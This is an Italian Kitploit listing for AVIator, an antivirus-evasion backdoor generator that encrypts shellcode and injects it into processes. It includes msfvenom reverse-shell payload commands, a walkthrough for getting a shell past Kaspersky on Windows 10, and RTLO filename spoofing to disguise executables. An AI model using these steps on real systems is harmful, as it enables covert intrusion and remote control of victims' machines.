Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
AVIator — Progetto di evasione antivirus | Kitploit
Strumenti/GitHubGitHub/ch0pin/aviator
Strumenti di Crittografia/DecrittografiaFramework di ExploitGenerazione di PayloadShellcodePenetration TestingRed TeamingArchived
GitHubch0pin/aviator

AVIator

Progetto di evasione antivirus

Vedi Repository
1.2k2301 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

AviAtor Portato a NETCore 5 con un'interfaccia utente aggiornata

AV|Ator

Informazioni://nome

AV: Antivirus

Ator: È un spadaccino, alchimista, scienziato, mago, studioso e ingegnere, con la capacità di produrre talvolta oggetti dal nulla (https://en.wikipedia.org/wiki/Ator)

Informazioni://scopo

AV|Ator è un'utility generatrice di backdoor, che utilizza tecniche crittografiche e di iniezione per bypassare il rilevamento degli AV. Più specificamente:

  • Utilizza la crittografia AES per crittografare uno shellcode dato
  • Genera un file eseguibile che contiene il payload crittografato
  • Lo shellcode viene decrittografato e iniettato nel sistema di destinazione utilizzando varie tecniche di iniezione

[https://attack.mitre.org/techniques/T1055/]:

  1. Iniezione di eseguibili portatili che comporta la scrittura di codice dannoso direttamente nel processo (senza un file su disco) e quindi l'invocazione dell'esecuzione con codice aggiuntivo o creando un thread remoto. Lo spostamento del codice iniettato introduce il requisito aggiuntivo di rimappare i riferimenti di memoria. Variazioni di questo metodo come l'iniezione riflessiva di DLL (scrittura di una DLL auto-mappante in un processo) e il modulo di memoria (mappatura DLL durante la scrittura nel processo) superano il problema del rilocazione degli indirizzi.

  2. Dirottamento dell'esecuzione del thread che comporta l'iniezione di codice dannoso o il percorso di una DLL in un thread di un processo. Simile a Process Hollowing, il thread deve essere prima sospeso.

Utilizzo

L'applicazione ha un modulo composto da tre input principali (vedi screenshot sotto):

Screenshot 2019-04-29 at 11 41 21

  1. Un testo contenente la chiave di crittografia utilizzata per crittografare lo shellcode
  2. Un testo contenente il IV utilizzato per la crittografia AES
  3. Un testo contenente lo shellcode

Nota importante: lo shellcode deve essere fornito come array di byte C#.

I valori predefiniti contengono shellcode che esegue notepad.exe (32 bit). Questa demo è fornita come indicazione di come il codice dovrebbe essere formato (usando msfvenom, questo può essere facilmente fatto con l'opzione -f csharp, ad esempio msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=XXXX -f csharp).

Dopo aver riempito gli input forniti e selezionato il percorso di output, viene generato un eseguibile in base alle opzioni scelte.

Opzione RTLO

In parole semplici, si spaccia un file eseguibile per avere un'estensione 'innocua' come 'pdf', 'txt' ecc. Ad esempio, il file "testcod.exe" verrà interpretato come "tesexe.doc"

Attenzione al fatto che alcuni AV segnalano lo spoof di per sé come malware.

Imposta icona personalizzata

Immagino che tutti sappiate di cosa si tratta :)

Bypass di Kaspersky AV su un host Win 10 x64 (CASO DI TEST)

Ottenere una shell in una macchina Windows 10 con Kaspersky AV completamente aggiornato

Macchina di destinazione: Windows 10 x64

  1. Creare il payload utilizzando msfvenom

    msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=443 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

  2. Utilizzare AVIator con le seguenti impostazioni

    Architettura del sistema operativo di destinazione: x64 Tecnica di iniezione: Thread Hijacking (Shellcode Arch: x64, OS arch: x64) Procedura di destinazione: explorer (lasciare il default)

  3. Impostare il listener sulla macchina attaccante

  4. Eseguire l'exe generato sulla macchina vittima

Installazione

Windows:

Compila il progetto o scarica l'eseguibile già compilato dalla seguente cartella:

https://github.com/Ch0pin/AVIator/tree/master/Compiled%20Binaries

Linux:

Installa Mono secondo la tua distribuzione Linux, scarica ed esegui i binari

e.g. in kali:

root@kitploit:~
   root@kali# apt install mono-devel 
   
   root@kali# mono aviator.exe

Crediti

A Damon Mohammadbagher per la procedura di crittografia

Dichiarazione di non responsabilità

Ho sviluppato questa app per superare le impegnative sfide del processo di pentest e questo è l'UNICO MODO in cui questa app dovrebbe essere utilizzata. Assicurati di avere l'autorizzazione necessaria per utilizzarla contro un sistema e non usarla mai per scopi illegali.

Scarica lo strumento